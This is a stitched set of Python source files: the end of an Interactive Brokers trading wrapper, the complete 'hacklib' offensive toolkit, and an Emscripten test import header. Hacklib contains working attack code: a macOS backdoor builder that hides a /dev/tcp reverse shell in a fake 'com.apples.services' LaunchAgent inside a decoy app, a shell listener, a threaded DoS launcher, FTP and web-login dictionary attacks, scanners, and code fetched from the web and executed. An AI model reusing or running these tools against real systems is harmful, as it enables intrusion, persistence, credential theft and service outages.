orders_matching_given_order = {o.id for o in self.get_open_orders() if o == order}
order_ids = orders_matching_given_order.difference(order_ids_existing_before)
return next(iter(order_ids)) if len(order_ids) == 1 else None
def _execute_single_order(self, order) -> Optional[int]:
with self.lock:
order_id = self.wrapper.next_order_id()
self._reset_action_lock()
self.wrapper.set_waiting_order_id(order_id)
ib_contract = self.contract_ticker_mapper.ticker_to_contract(order.ticker)
ib_order = self._to_ib_order(order)
self.client.placeOrder(order_id, ib_contract, ib_order)
if self._wait_for_results(10):
return order_id
def _wait_for_results(self, waiting_time: Optional[int] = None) -> bool:
""" Wait for self.waiting_time """
waiting_time = waiting_time or self.waiting_time
wait_result = self.action_event_lock.wait(waiting_time)
return wait_result
def _reset_action_lock(self):
""" threads calling wait() will block until set() is called"""
self.action_event_lock.clear()
def _to_ib_order(self, order: Order):
ib_order = IBOrder()
ib_order.action = 'BUY' if order.quantity > 0 else 'SELL'
ib_order.totalQuantity = abs(order.quantity)
ib_order = self._set_execution_style(ib_order, order.execution_style)
time_in_force = order.time_in_force
tif_str = self._map_to_tif_str(time_in_force)
ib_order.tif = tif_str
return ib_order
def _map_to_tif_str(self, time_in_force):
if time_in_force == TimeInForce.GTC:
tif_str = "GTC"
elif time_in_force == TimeInForce.DAY:
tif_str = "DAY"
elif time_in_force == TimeInForce.OPG:
tif_str = "OPG"
else:
raise ValueError("Not supported TimeInForce {tif:s}".format(tif=str(time_in_force)))
return tif_str
def _set_execution_style(self, ib_order, execution_style):
if isinstance(execution_style, MarketOrder):
ib_order.orderType = "MKT"
elif isinstance(execution_style, StopOrder):
ib_order.orderType = "STP"
ib_order.auxPrice = execution_style.stop_price
return ib_order
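
# Hedged usage sketch (my_mapper and my_order are hypothetical objects supplied by the
# caller; TWS/IB Gateway is assumed to listen on the default paper-trading port 7497):
# the typical life cycle of an IBBroker instance.
def _example_ib_broker_usage(my_mapper: IBContractTickerMapper, my_order: Order):
    broker = IBBroker(contract_ticker_mapper=my_mapper, clientId=0, host="127.0.0.1", port=7497)
    print(broker.get_portfolio_value())
    order_ids = broker.place_orders([my_order])
    broker.cancel_all_open_orders()
    # reqGlobalCancel gives no completion signal, so poll until the open-order list is empty.
    while broker.get_open_orders():
        pass
    broker.stop()
    return order_ids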
|
hacklib.py
|
'''The MIT License (MIT)
Copyright (c) 2016 Leon Li (leon@apolyse.com)
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and
associated documentation files (the "Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.'''
import socket
import threading
import time
import urllib2
import os
import Queue
try: # Import scapy if they have it. If they don't, they can still use hacklib
from scapy.all import *
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Fixes scapy logging error
except:
pass
from string import ascii_uppercase, ascii_lowercase, digits # Import for PatternCreate and PatternOffset
class Backdoor(object):
'''Creates an app carrying a persistent backdoor payload. Currently only for Mac OSX.
Payloads for Windows and Linux coming soon.'''
def __init__(self):
self.IP = ''
self.port = ''
self.osx_payload = '''#!/bin/bash
mkdir ~/Library/.h
echo '#!/bin/bash
bash -i >& /dev/tcp/HOST/PORT 0>&1
wait' > ~/Library/.h/connect.sh
chmod +x ~/Library/.h/connect.sh
echo '<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apples.services</string>
<key>ProgramArguments</key>
<array>
<string>/bin/sh</string>
<string>'$HOME'/Library/.h/connect.sh</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>StartInterval</key>
<integer>60</integer>
<key>AbandonProcessGroup</key>
<true/>
</dict>
</plist>' > ~/Library/LaunchAgents/com.apples.services.plist
chmod 600 ~/Library/LaunchAgents/com.apples.services.plist
launchctl load ~/Library/LaunchAgents/com.apples.services.plist
exit
'''
def create(self, IP, port, OS, appname='funny_cats'):
'''Creates a user-level reverse shell.'''
if OS == 'OSX':
self.osx_payload = self.osx_payload.replace('HOST', IP).replace('PORT', str(port))
try:
os.makedirs(os.getcwd() + '/' + appname + '.app/Contents/MacOS')
except:
pass
payload_path = os.getcwd() + '/' + appname + '.app/Contents/MacOS/' + appname
with open(payload_path, 'w') as f:
f.write(self.osx_payload)
import subprocess
subprocess.Popen(['chmod', '755', payload_path])
print 'Payload saved to ' + os.getcwd() + '/' + appname + '.app'
class Server(object):
def __init__(self, port):
import socket
self.port = port
self.address = ('', port)
def listen(self):
import time
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(self.address)
sock.listen(1)
while True:
connection, cAddress = sock.accept()
try:
print 'New connection', cAddress
while True:
data = connection.recv(32768)
if data:
print '\n'.join(data.split('\n')[:-1])
response = raw_input('bash$ ')
data = None
if response:
connection.sendall(response + '\n')
time.sleep(0.5)
finally:
connection.close()
class FTPAuth(object):
'''FTP login and command handler.
Commands:
login() Args: username, password
send() Args: message
'''
def __init__(self, IP, port=21):
self.IP = IP
self.port = port
self.username = ''
self.password = ''
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.settimeout(5)
self.s.connect((self.IP, self.port))
self.s.recv(1024)
def _send(self, message):
self.s.send(message)
response = self.s.recv(32768)
return response
def send(self, message):
self.s.send(message + '\r\n')
while True:
response = self.s.recv(32768)
if response:
return response
def login(self, username, password):
self._send('USER ' + username + '\r\n')
response = self._send('PASS ' + password + '\r\n')
if '230' in response:
return
elif '331' in response:
return 'Password required'
else:
raise Exception(response)
class AuthClient(object):
'''Universal login tool for most login pages as well as HTTP Basic Authentication.
Commands:
login() Args: url, username, password
'''
def __init__(self):
self.url = ''
self.username = ''
self.password = ''
def _get_login_type(self):
try:
# Attempts to urlopen target URL without exception
data = urllib2.urlopen(self.url)
return 'FORM'
except Exception, e:
if 'error 401' in str(e).lower():
return 'BA'
if 'timed out' in str(e).lower():
return 'TO'
def _login_mechanize(self):
try:
import mechanize
except:
raise MissingPackageException('Please install the mechanize module before continuing.')
# Sets up common input names/ids and creates instance of mechanize.Browser()
userfields = ['user', 'username', 'usr', 'email', 'name', 'login', 'userid', 'userid-input', 'player']
passfields = ['pass', 'password', 'passwd', 'pw', 'pwd']
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(False)
br.addheaders = [('User-agent', 'googlebot')]
# Opens URL and lists controls
response = br.open(self.url)
loginurl = response.geturl()
br.form = list(br.forms())[0]
username_control = ''
password_control = ''
# Locates username and password input, and submits login info
for control in br.form.controls:
if control.name and control.name.lower() in userfields or control.id and control.id.lower() in userfields:
username_control = control
if control.name and control.name.lower() in passfields or control.id and control.id.lower() in passfields:
password_control = control
username_control.value = self.username
try:
password_control.value = self.password
except:
# Detected a username input but not a password input.
# Submits form with username and attempts to detect password input in resulting page
response = br.submit()
br.form = list(br.forms())[0]
for control in br.form.controls:
if control.name and control.name.lower() in passfields or control.id and control.id.lower() in passfields:
password_control = control
password_control.value = self.password
response = br.submit()
# Returns response if the URL is changed. Assumes login failure if URL is the same
if response.geturl() != loginurl:
return response.read()
else:
raise Exception('Login credentials incorrect.')
def _login_BA(self):
try:
# Creates a PasswordMgr instance
passmanager = urllib2.HTTPPasswordMgrWithDefaultRealm()
passmanager.add_password(None, self.url, self.username, self.password)
# Creates an auth handling object and builds it with opener
auth = urllib2.HTTPBasicAuthHandler(passmanager)
opener = urllib2.build_opener(auth)
response = opener.open(self.url, timeout=8)
data = response.read()
response.close()
return data
except Exception, e:
if 'Error 401' in str(e):
raise Exception('Login credentials incorrect.')
def login(self, url, username, password):
self.url = url
self.username = username
self.password = password
# ascertain the type of login page given by url
logintype = self._get_login_type()
if logintype == 'BA':
# attempts to login with BA method and return html
return self._login_BA()
if logintype == 'TO':
raise Exception('Request timed out.')
if logintype == 'FORM':
return self._login_mechanize()
class DOSer(object):
'''Hits a host with GET requests on default port 80 from multiple threads.
Commands:
launch() Args: host, duration, threads(default 1), port(default 80),
payload(default crocodile)
'''
def __init__(self):
self.target = '127.0.0.1'
self.port = 80
self.threads = 1
self.payload = '?INTERIORCROCODILEALLIGATORIDRIVEACHEVROLETMOVIETHEATER'
self.start_time = 0
self.time_length = 1
def _attack(self, target):
# Sends GET requests for time_length duration
while int(time.time()) < self.start_time + self.time_length:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
try:
s.connect((self.target, self.port))
s.send("GET /" + self.payload + " HTTP/1.1\r\n")
s.send("Host: " + self.target + "\r\n\r\n")
except:
pass
def _threader(self):
while True:
self.worker = self.q.get()
self._attack(self.worker)
self.q.task_done()
def launch(self, host, duration, threads=1, port=80, payload='default'):
'''Launches threaded GET requests for (duration) seconds.
'''
self.target = host
self.port = port
self.threads = threads
self.start_time = int(time.time())
self.time_length = duration
if payload != 'default':
self.payload = payload
# Creates queue to hold each thread
self.q = Queue.Queue()
#print '> Launching ' + str(threads) + ' threads for ' + str(duration) + ' seconds.'
for i in range(threads):
t = threading.Thread(target=self._threader)
t.daemon = True
t.start()
# Adds workers to queue
for worker in range(0, threads):
self.q.put(worker)
self.q.join()
return
class PortScanner(object):
'''Scan an IP address using scan(host) with default port range 1-1024.
Commands:
scan() Args: IP, port_range(default 1024), timeout(default 1), verbose(default True)
'''
def __init__(self):
self.IP = '127.0.0.1'
self.port_range = '1025'
self.print_lock = threading.Lock()
self.timeout = 2
self.openlist = []
self.verbose = True
def _portscan(self, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(self.timeout)
# Tries to establish a connection to port, and append to list of open ports
try:
con = s.connect((self.IP, port))
response = s.recv(1024)
self.openlist.append(port)
if self.verbose:
with self.print_lock:
print 'Port', str(port) + ':'
print response
s.close()
# If the connection fails, tries to establish HTTP connection if port is a common HTTP port
except Exception, e:
httplist = [80, 81, 443, 1900, 2082, 2083, 8080, 8443]
if port in httplist:
try:
headers = '''GET / HTTP/1.1
Host: ''' + self.IP + '''
User-Agent: googlebot
Accept: text/html, application/xhtml+xml, application/xml; q=0.9, */*; q=0.8
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate''' + '\r\n\r\n'
s.send(headers)
response = s.recv(1024)
response = response.splitlines()
response = '\n'.join(response[:7])
self.openlist.append(port)
if self.verbose:
with self.print_lock:
print 'Port', str(port) + ':'
print response
s.close()
except:
pass
def portOpen(self, port):
return port in self.openlist
def _threader(self):
while True:
self.worker = self.q.get()
self._portscan(self.worker)
self.q.task_done()
def scan(self, IP, port_range=(1, 1025), timeout=1, verbose=True):
'''Scans ports of an IP address. Use getIP() to find IP address of host.
'''
self.openlist = []
self.IP = IP
self.port_range = port_range
self.timeout = timeout
self.verbose = verbose
# Creates queue to hold each thread
self.q = Queue.Queue()
for x in range(30):
t = threading.Thread(target=self._threader)
t.daemon = True
t.start()
# Adds workers to queue
for worker in range(port_range[0], port_range[1]):
self.q.put(worker)
self.q.join()
class LanScanner(object):
'''Scans local devices on your LAN network.
Commands:
scan() Args: host_range(default (1, 255))
'''
def __init__(self):
self.host_range = []
self.alive_hosts = []
self.localIP = ''
def _threader(self):
while True:
self.worker = self.q.get()
self._scan(self.worker)
self.q.task_done()
def _scan(self, host):
import subprocess
try:
resp = subprocess.check_output(['ping', '-c1', '-W90', host])
self.alive_hosts.append(host)
except:
return
def getLocalIP(self):
import subprocess
proc = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE, shell=True)
(out, err) = proc.communicate()
data = out.splitlines()
for line in data:
if 'inet ' in line and '127.' not in line:
return line.split(' ')[1]
def scan(self, h_range=(1, 255)):
# Finds local IP first in order to determine IP range of local network
localip = self.getLocalIP()
stub = '.'.join(localip.split('.')[:-1])
# Adds list of possible local hosts to self.host_range
for i in range(h_range[0], h_range[1]):
self.host_range.append(stub + '.' + str(i))
self.q = Queue.Queue()
# Launches 100 threads to ping 254 potential hosts
for x in range(100):
t = threading.Thread(target=self._threader)
t.daemon = True
t.start()
for worker in self.host_range:
self.q.put(worker)
self.q.join()
return list(set(self.alive_hosts))
class _Getch:
"""Gets a single character from standard input. Does not echo to the
screen."""
def __init__(self):
try:
self.impl = _GetchWindows()
except ImportError:
try:
self.impl = _GetchUnix()
except ImportError:
self.impl = _GetchMacCarbon()
def __call__(self): return self.impl()
class _GetchUnix:
def __init__(self):
import tty
import sys
import termios
def __call__(self):
import sys
import tty
import termios
try:
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
except:
return raw_input('> ')
class _GetchWindows:
def __init__(self):
import msvcrt
def __call__(self):
try:
import msvcrt
return msvcrt.getch()
except:
return raw_input('> ')
class Proxy(object):
'''Can work in conjunction with getProxies() to tunnel all
network activity in the Python script through a Socks4/5 proxy.
Commands:
connect() Args: getProxies(), timeout=10
connect_manual() Args: IP, port, proxy_type
'''
def __init__(self):
self.IP = ''
self.port = ''
self.proxy_type = ''
self.country = ''
self._socksfile = urllib2.urlopen('https://raw.githubusercontent.com/Anorov/PySocks/master/socks.py').read()
global socks
# Dynamically import socks.py from the internet
socks = importFromString(self._socksfile, 'socks')
def connect(self, proxies, timeout=10):
for proxy in proxies:
if proxy[4] == 'Socks4':
self.proxy_type = socks.PROXY_TYPE_SOCKS4
else:
self.proxy_type = socks.PROXY_TYPE_SOCKS5
try:
# Sets the socket.socket class to the socks module's socksocket class
socks.setdefaultproxy(self.proxy_type, proxy[0], int(proxy[1]))
socket.socket = socks.socksocket
# Tests to see if the proxy can open a webpage
currentIP = urllib2.urlopen('http://icanhazip.com/', timeout=timeout).read().split()[0]
self.IP = proxy[0]
self.port = int(proxy[1])
self.country = proxy[2]
return
except:
pass
raise Exception('Couldn\'t connect to any proxies.')
def connect_manual(self, IP, port, proxy_type='Socks5'):
if proxy_type == 'Socks4':
self.proxy_type = socks.PROXY_TYPE_SOCKS4
else:
self.proxy_type = socks.PROXY_TYPE_SOCKS5
try:
socks.setdefaultproxy(self.proxy_type, IP, port)
socket.socket = socks.socksocket
currentIP = urllib2.urlopen('http://icanhazip.com/').read().split()[0]
self.IP = IP
self.port = port
return currentIP
except:
raise Exception('Connection failed.')
def importFromString(code, name):
"""Import dynamically generated code as a module.
Args: code: a string, a file handle, or a compiled binary
name: the name of the module
"""
import sys
import imp
module = imp.new_module(name)
exec code in module.__dict__
return module
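# Hedged usage sketch (module name and source string are illustrative): importFromString
# turns a source string into a live module object.
def _example_import_from_string():
    adder = importFromString("def add(a, b):\n    return a + b\n", "adder")
    return adder.add(1, 2)  # 3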
def getIP(host):
return socket.gethostbyname(host)
def randomIP():
import random
import struct
return socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff)))
def getProxies(country_filter='ALL', proxy_type=('Socks4', 'Socks5')):
'''Gets list of recently tested Socks4/5 proxies.
Return format is as follows:
[IP, Port, Country Code, Country, Proxy Type, Anonymous, Yes/No, Last Checked]
Args: country_filter: Specify country codes within a tuple, e.g. ('US', 'MX')
proxy_type: Specify which Socks version to use, e.g. 'Socks5'
'''
try:
import mechanize
except:
raise MissingPackageException('Please install the mechanize module before continuing. Use hacklib.installDependencies()')
try:
from bs4 import BeautifulSoup
except:
raise MissingPackageException('Please install the beautifulsoup4 module before continuing. Use hacklib.installDependencies()')
br = mechanize.Browser()
br.set_handle_robots(False)
br.addheaders = [('User-agent', 'googlebot')]
data = br.open('http://www.socks-proxy.net').read()
soup = BeautifulSoup(data, 'html.parser')
proxylist = []
table = soup.find('table')
tbody = table.find('tbody')
rows = tbody.find_all('tr')
for row in rows:
cols = row.find_all('td')
cols = [ele.text.strip() for ele in cols]
proxylist.append([ele for ele in cols if ele])
filteredlist = []
if not country_filter == 'ALL':
for proxy in proxylist:
if proxy[2] in country_filter:
filteredlist.append(proxy)
proxylist = filteredlist
filteredlist = []
if not proxy_type == ('Socks4', 'Socks5'):
for proxy in proxylist:
if not country_filter == 'ALL':
if proxy[4] in proxy_type and proxy[2] in country_filter:
filteredlist.append(proxy)
else:
if proxy[4] in proxy_type:
filteredlist.append(proxy)
proxylist = filteredlist
return proxylist
def installDependencies():
import subprocess
mech = subprocess.check_output(['/usr/local/bin/pip', 'install', 'mechanize'])
if 'successfully installed' in mech.lower():
print 'Installed mechanize'
beaut = subprocess.check_output(['/usr/local/bin/pip', 'install', 'bs4'])
if 'successfully installed' in beaut.lower():
print 'Installed beautifulsoup'
scapy = subprocess.check_output(['/usr/local/bin/pip', 'install', 'scapy'])
if 'successfully installed' in scapy.lower():
print 'Installed scapy'
pcapy = subprocess.check_output(['/usr/local/bin/pip', 'install', 'pcapy'])
if 'successfully installed' in pcapy.lower():
print 'Installed pcapy'
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def send(IP, port, message, keepalive=False):
'''Creates new socket and sends a TCP message. If keepalive is true, use hacklib.sock
to handle socket and hacklib.sock.close() when finished.
'''
if keepalive:
global sock
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((IP, port))
sock.send(message)
response = sock.recv(2048)
if not keepalive:
sock.close()
return response
def ping(host):
"""Pings a host and returns true if the host exists.
"""
import os
import platform
ping_str = "-n 1" if platform.system().lower() == "windows" else "-c 1"
return os.system("ping " + ping_str + " " + host) == 0
def topPasswords(amount):
'''Get up to 100,000 most common passwords.
'''
url = 'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/10_million_password_list_top_100000.txt'
passlist = urllib2.urlopen(url).read().split('\n')
return passlist[:amount]
def uiPortScan(address):
print ''
print '1) default scan (port range 1-1024)'
print '2) custom range'
ink = _Getch()
cmd = ink()
ps = PortScanner()
print 'Beginning port scan.'
if cmd == '1':
ps.scan(address)
if cmd == '2':
s_port = raw_input('Input starting port > ')
e_port = raw_input('Input end port >')
ps.scan(address, (int(s_port), int(e_port)))
print 'Port scan complete.'
def uiDOS(address):
dos = DOSer()
print ''
duration = int(raw_input('Duration > '))
threads = int(raw_input('Threads > '))
port = int(raw_input('Port > '))
payload = raw_input('Payload > ')
print 'Launching DOS attack'
dos.launch(address, duration, threads, port, payload)
def uiTCPMessage(address):
print ''
port = int(raw_input('Input port >'))
message = raw_input('Message > ')
send(address, port, message)
def uiLogin(address):
print ''
print 'Select login type'
print '1) HTTP/Form login'
print '2) FTP login'
print '3) Exit'
print ''
ink = _Getch()
cmd = ink()
if cmd == '1':
ac = AuthClient()
print '1) Dictionary attack'
print '2) Exit'
ink = _Getch()
cmd = ink()
if cmd == '1':
username = raw_input('Username > ')
print '1) Try most common passwords'
print '2) Import password list (separated by newline)'
cmd = ink()
if cmd == '1':
print 'Try the top <input number> out of 100,000 most common passwords:'
num = int(raw_input('> '))
passwords = topPasswords(num)
if cmd == '2':
passfile = raw_input('Filepath > ')
with open(passfile, 'r') as f:
passwords = f.read().splitlines()
print 'Input a unique string the webpage may respond with if login fails'
print 'i.e. "please try again" or "login failed"'
failstring = raw_input('> ')
for password in passwords:
try:
data = ac.login(address, username, password)
if failstring in data:
print password + ' failed'
elif failstring not in data:
print 'Login success!'
print 'Password is: ' + password
time.sleep(2)
return
except:
print password + ' failed'
if cmd == '2':
return
if cmd == '2':
ftp = FTPAuth(address)
print '1) Dictionary attack'
print '2) Single login'
print '3) Exit'
ink = _Getch()
cmd = ink()
username = raw_input('Username > ')
if cmd == '1':
print 'Try the top <input number> out of 100,000 most common passwords:'
num = int(raw_input('> '))
for password in topPasswords(num):
try:
response = ftp.send('USER ' + username + '\r\n')
if '331' in response:
response = ftp.send('PASS ' + password + '\r\n')
if '331' in response:
response = ftp.send('PASS ' + password + '\r\n')
if '230' in response:
print 'Login success!'
print 'Password is: ' + password
time.sleep(2)
return
if '530' in response:
print password + ' failed.'
ftp = FTPAuth(address)
except:
print password + ' failed.'
ftp = FTPAuth(address)
if cmd == '2':
username = raw_input('Username > ')
ftp.send('USER ' + username + '\r\n')
password = raw_input('Password > ')
ftp.send('PASS ' + password + '\r\n')
if cmd == '3':
return
def uiLanScan():
lan = LanScanner()
print 'Starting Lan scan'
hosts = lan.scan()
for ip in hosts:
print ip
print 'Lan scan complete.'
time.sleep(2)
def uiCreateBackdoor():
print ''
print 'Select OS'
print '1) Mac OSX'
ink = _Getch()
cmd = ink()
if cmd == '1':
ip = raw_input('Listener IP > ')
port = raw_input('Listener Port > ')
appname = raw_input('Filename > ')
bd = Backdoor()
bd.create(ip, port, 'OSX', appname)
time.sleep(2)
def uiServer():
print ''
port = raw_input('Listening port > ')
s = Server(int(port))
print 'Listening on port ' + port
s.listen()
def userInterface():
'''Start UI if hacklib isn't being used as a library.
'''
firstrun = 0
while True:
if firstrun == 0:
print '----------------------------------------------'
print 'Hey. What can I do you for?'
print '\n'
firstrun += 1
print 'Enter the number corresponding to your choice.'
print ''
print '1) Connect to a proxy'
print '2) Target an IP or URL'
print '3) Lan Scan'
print '4) Create Backdoor'
print '5) Server'
print '6) Exit'
ink = _Getch()
cmd = ink()
if cmd == '6':
return
if cmd == '2':
address = raw_input('Input IP or URL > ')
if '.' not in address:
print 'Invalid IP/URL.'
return
print 'What would you like to do?'
print ''
print '1) Port scan'
print '2) DOS'
print '3) Send TCP message'
print '4) Attempt login'
print '5) Exit'
cmd = ink()
if cmd == '1':
uiPortScan(getIP(address))
if cmd == '2':
uiDOS(getIP(address))
if cmd == '3':
uiTCPMessage(getIP(address))
if cmd == '4':
uiLogin(address)
cmd = ''
if cmd == '3':
uiLanScan()
if cmd == '4':
uiCreateBackdoor()
if cmd == '5':
uiServer()
if cmd == '1':
print 'Would you like to automatically find a proxy or input one manually?'
print 'Enter the number corresponding to your choice.'
print ''
print '1) Auto'
print '2) Manual'
cmd = ink()
print 'Connecting to a SOCKS proxy.'
proxies = getProxies()
global proxy
proxy = Proxy()
if cmd == '1':
proxy.connect(proxies)
print 'Your new IP address is ' + proxy.IP
print 'This proxy is located in ' + proxy.country
print '---------'
time.sleep(2)
if cmd == '2':
pr_address = raw_input('Proxy address > ')
pr_port = raw_input('Proxy port > ')
pr_type = raw_input('Enter "Socks4" or "Socks5" > ')
try:
proxy.connect_manual(pr_address, int(pr_port), pr_type)
except:
print 'Connection failed.'
time.sleep(2)
pass
print 'Proxy connected.'
time.sleep(2)
pass
"""
This Class Mangles Words specified by the user
Example:
Test = hacklib.Mangle("Test", 1, 10, 1996, 2016)
Test.Leet()
Output: T3st
"""
class Mangle:
def __init__(self, text, num1, num2, year1, year2):
self.num1 = num1
self.num2 = num2
self.year1 = year1
self.year2 = year2
self.text = text
def Numbers(self):
for x in self.text.split():
for i in range(self.num1, self.num2):
print ("%s" + "%s") % (x, i)
print ("%s" + "%s") % (i, x)
def Years(self):
for x in self.text.split():
for i in range(self.year1, self.year2):
print ("%s" + "%s") % (x, i)
print ("%s" + "%s") % (i, x)
def UniqueNum(self):
for x in self.text.split():
for i in range(self.num1, self.num2):
print ("%s" + "%s" + "%s") % (x, x, i)
def UniqueYears(self):
for x in self.text.split():
for i in range(self.year1, self.year2):
print ("%s" + "%s" + "%s") % (x, x, i)
def FirstLetterCapNum(self):
for x in self.text.split():
for i in range(self.num1, self.num2):
print ("%s" + "%s") % (x.capitalize(), i)
print ("%s" + "%s") % (i, x.capitalize())
def Caps(self):
for x in self.text.split():
print x.capitalize()
def UniqueCaps(self):
for x in self.text.split():
print ("%s" + "s") % (x.capitalize(), x.capitalize())
def CapandYears(self):
for x in self.text.split():
for i in range(self.year1, self.year2):
print ("%s" + "%s") % (x.capitalize(), i)
print ("%s" + "%s") % (i, x.capitalize())
def Leet(self):
for x in self.text.split():
print x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8")
def LeetCap(self):
for x in self.text.split():
print x.capitalize().replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8")
def LeetYears(self):
for x in self.text.split():
for i in range(self.year1, self.year2):
print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"), i)
print ("%s" + "%s") % (i, x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"))
def LeetNumbers(self):
for x in self.text.split():
for i in range(self.num1, self.num2):
print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"), i)
print ("%s" + "%s") % (i, x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"))
def UniqueLeet(self):
for x in self.text.split():
print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"), (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8")))
def Reverse(self):
for x in self.text.split():
print x[::-1]
def ReverseCap(self):
for x in self.text.split():
print x[::-1].capitalize()
def ReverseNum(self):
for x in self.text.split():
for i in range(self.num1, self.num2):
print ("%s" + "%s") % (x[::-1], i)
print ("%s" + "%s") % (i, x[::-1])
def ReverseYears(self):
for x in self.text.split():
for i in range(self.year1, self.year2):
print ("%s" + "%s") % (x[::-1], i)
print ("%s" + "%s") % (i, x[::-1])
def ReverseUnique(self):
for x in self.text.split():
print x[::-1] + x[::-1]
'''
This class detects probe requests from wireless devices.
Example:
Probe = Proberequests("wlan0")
Probe.startSniff()
'''
class Proberequests:
global probeReqs
probeReqs = []
def __init__(self, interface):
self.interface = interface
def sniffProbe(self, p):
if p.haslayer(Dot11ProbeReq):
netName = p.getlayer(Dot11ProbeReq).info
if netName not in probeReqs:
probeReqs.append(netName)
print '[!] Detected New Probe Request: '
print "[+] ESSID: " + netName + " BSSID: " + p.addr2
def startSniff(self):
print "[+] Scanning...\n"
sniff(iface=self.interface, prn=self.sniffProbe)
"""
This class creates a unique pattern of up to 20280 characters.
This is a replica of the metasploit tool called pattern_create.rb
Example:
patternTest = PatternCreate(1000)
patternTest.generate()
Creates a unique pattern of 1000 characters.
"""
class PatternCreate:
global MAX_PATTERN_LENGTH
MAX_PATTERN_LENGTH = 20280
def __init__(self, length):
self.length = length
def generate(self):
output = []
"""
Generate a pattern of a given length up to a maximum
of 20280 - after this the pattern would repeat
"""
if self.length >= MAX_PATTERN_LENGTH:
# MaxLengthException is not defined anywhere in this module, so raise ValueError instead
raise ValueError('ERROR: Pattern length exceeds maximum of %d' % MAX_PATTERN_LENGTH)
pattern = ''
for upper in ascii_uppercase:
for lower in ascii_lowercase:
for digit in digits:
if len(pattern) < self.length:
pattern += upper + lower + digit
# Append the truncated pattern once, after the loops, rather than once per leftover iteration
out = pattern[:self.length]
output.append(out)
print str(output)[1:-1].replace("'", "")
"""
This class finds the offset from the PatternCreate class.
This is a replica of the metasploit tool called pattern_offset.rb
Example:
offset = PatternOffset("Aw1A")
offset.find()
Finds offset of Aw1A.
Output: [+] Offset: 663
"""
class PatternOffset:
def __init__(self, search_pattern):
self.search_pattern = search_pattern
def find(self):
offset = []
needle = self.search_pattern
try:
if needle.startswith('0x'):
# Strip off '0x', hex-decode to ASCII (Python 2) and reverse
needle = needle[2:].decode('hex')
needle = needle[::-1]
except TypeError as e:
print 'Unable to convert hex input:', e
import sys
sys.exit(1)
haystack = ''
for upper in ascii_uppercase:
for lower in ascii_lowercase:
for digit in digits:
haystack += upper+lower+digit
found_at = haystack.find(needle)
if found_at > -1:
offset = found_at
print "[+] Offset: " + str(offset)
class MissingPackageException(Exception):
'''Raise when 3rd party modules are not able to be imported.'''
class MissingPipexception(Exception):
'''Raise when pip is not able to be found'''
# Run the interactive UI only after all module-level classes have been defined
if __name__ == '__main__':
userInterface()
|
common.py
|
# Copyright 2021 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
from enum import Enum
from functools import wraps
from pathlib import Path
from subprocess import PIPE, STDOUT
from urllib.parse import unquote, unquote_plus
from http.server import HTTPServer, SimpleHTTPRequestHandler
import contextlib
import difflib
import hashlib
import logging
import multiprocessing
import os
import re
import shlex
import shutil
import stat
import string
import subprocess
import sys
import tempfile
import time
import webbrowser
import unittest
import clang_native
import jsrun
